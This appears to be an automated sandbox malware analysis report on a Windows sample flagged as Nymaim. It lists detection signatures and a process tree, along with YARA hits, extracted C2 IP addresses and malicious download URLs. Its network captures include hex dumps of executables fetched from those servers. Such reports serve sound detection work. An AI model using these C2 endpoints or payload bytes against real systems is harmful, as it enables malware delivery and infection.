
Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 715150
MD5: a3b774ed5023f56970eea0668ae65703
SHA1: 3aebfec7980d1db1edbeccbb29044ea677be304b
SHA256: f4f6bcce8531ffa055776e57b0f650b7f87049808e3b29d65fab79ec841ed81c
Tags: exe

Detection

Nymaim
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Nymaim
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Binary is likely a compiled AutoIt script file
Machine Learning detection for sample
May check the online IP address of the machine
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Downloads executable code via HTTP
Enables debug privileges
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • file.exe (PID: 5380 cmdline: C:\Users\user\Desktop\file.exe MD5: A3B774ED5023F56970EEA0668AE65703)
    • WerFault.exe (PID: 5700 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 528 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5208 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 700 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5604 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 732 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5676 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 744 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5944 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 776 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 4600 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 900 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 4760 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 964 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5716 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1152 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 1332 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1280 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • cmd.exe (PID: 5252 cmdline: C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Cleaner.exe (PID: 5272 cmdline: "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe" MD5: 04514BD4962F7D60679434E0EBE49184)
    • WerFault.exe (PID: 3940 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1272 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
{"C2 addresses": ["208.67.104.97", "85.31.46.167"]}
Source | Rule | Description | Author | Strings
00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.266126410.000000000078A000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x1038:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B

Source | Rule | Description | Author | Strings
0.3.file.exe.2210000.0.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
0.0.file.exe.710e67.8.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
0.0.file.exe.400000.7.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
0.0.file.exe.710e67.6.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
0.0.file.exe.400000.3.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: file.exe | ReversingLabs: Detection: 47%
Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte | URL Reputation: Label: malware
Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte | URL Reputation: Label: malware
Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst | URL Reputation: Label: malware
Source: http://171.22.30.106/library.php | URL Reputation: Label: malware
Source: http://85.31.46.167/software.phpZ | Virustotal: Detection: 5%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1] | ReversingLabs: Detection: 28%
Source: file.exe | Joe Sandbox ML: detected
Source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: Nymaim {"C2 addresses": ["208.67.104.97", "85.31.46.167"]}
Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49723 version: TLS 1.2
Source: Binary string: [C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdbPXC-@ source: file.exe
Source: Binary string: C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdb source: file.exe

Networking

Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe | DNS query: name: iplogger.org
Source: Malware configuration extractor | IPs: 208.67.104.97
Source: Malware configuration extractor | IPs: 85.31.46.167
Source: Joe Sandbox View | ASN Name: GRAYSON-COLLIN-COMMUNICATIONSUS GRAYSON-COLLIN-COMMUNICATIONSUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | IP Address: 148.251.234.83 148.251.234.83
Source: Joe Sandbox View | IP Address: 148.251.234.83 148.251.234.83
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 Oct 2022 15:32:32 GMTServer: Apache/2.4.41 (Ubuntu)Pragma: publicExpires: 0Cache-Control: must-revalidate, post-check=0, pre-check=0Cache-Control: privateContent-Disposition: attachment; filename="dll";Content-Transfer-Encoding: binaryContent-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 
00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 Oct 2022 15:32:33 GMTServer: Apache/2.4.41 (Ubuntu)Pragma: publicExpires: 0Cache-Control: must-revalidate, post-check=0, pre-check=0Cache-Control: privateContent-Disposition: attachment; filename="soft";Content-Transfer-Encoding: binaryContent-Length: 3947920Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f1 9a e4 ea 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 e4 14 00 00 0c 00 00 00 00 00 00 a6 02 15 00 00 20 00 00 00 20 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 02 15 00 4f 00 00 00 00 20 15 00 32 09 00 00 00 00 00 00 00 00 00 00 00 28 3c 00 90 15 00 00 00 40 15 00 0c 00 00 00 38 02 15 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac e2 14 00 00 20 00 00 00 e4 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 32 09 00 00 00 20 15 00 00 0a 00 00 00 e6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 f0 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 02 15 00 00 
00 00 00 48 00 00 00 02 00 05 00 68 81 00 00 40 45 00 00 01 00 00 00 54 00 00 06 a8 c6 00 00 90 3b 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2
Source: global traffic | HTTP traffic detected: GET /1Pz8p7 HTTP/1.1
    User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36
    Host: iplogger.org
    Connection: Keep-Alive
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown | TCP traffic detected without corresponding DNS query: 208.67.104.97
Source: unknown | TCP traffic detected without corresponding DNS query: 208.67.104.97
Source: unknown | TCP traffic detected without corresponding DNS query: 208.67.104.97
Source: unknown | TCP traffic detected without corresponding DNS query: 208.67.104.97
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown | TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: file.exe, 00000000.00000000.306032693.000000000019B000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://85.31.46.167/software.php
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://85.31.46.167/software.php$
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://85.31.46.167/software.phpCoo
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://85.31.46.167/software.phpO
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://85.31.46.167/software.phpP
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://85.31.46.167/software.phpZ
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://85.31.46.167/software.phpl
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://85.31.46.167/software.phpll
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://85.31.46.167/software.phpstem32
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://85.31.46.167/software.phpx
Source: Cleaner.exe, 00000021.00000002.650563112.0000024B1A9C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Cleaner.exe, 00000021.00000003.379618679.0000024B7E186000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.378593000.0000024B7E185000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.383731927.0000024B7E1C4000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.379712996.0000024B7E18F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://en.w
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: Cleaner.exe, 00000021.00000002.645497591.0000024B00418000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://iplogger.org
Source: Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.30.dr | String found in binary or memory: http://upx.sf.net
Source: Cleaner.exe, 00000021.00000003.396394419.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.395554408.0000024B7E186000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.396105393.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.395852274.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.agfamonotype.
Source: Cleaner.exe, 00000021.00000003.382564725.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Cleaner.exe, 00000021.00000003.387478626.0000024B7E190000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.387275120.0000024B7E190000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmled.
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315966725.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315735295.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316522296.0000000003248000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316150109.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316216498.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316046017.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316402159.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr | String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: Cleaner.exe, 00000021.00000003.391426565.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: Cleaner.exe, 00000021.00000003.391036732.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.391426565.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: Cleaner.exe, 00000021.00000003.402175756.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.404838301.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405253003.0000024B7E1C6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designerseK
Source: Cleaner.exe, 00000021.00000003.391186193.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersers
Source: Cleaner.exe, 00000021.00000003.391552464.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersp
Source: Cleaner.exe, 00000021.00000003.402175756.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.404838301.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405489220.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.409086991.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405253003.0000024B7E1C6000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405791697.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersrsivo
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
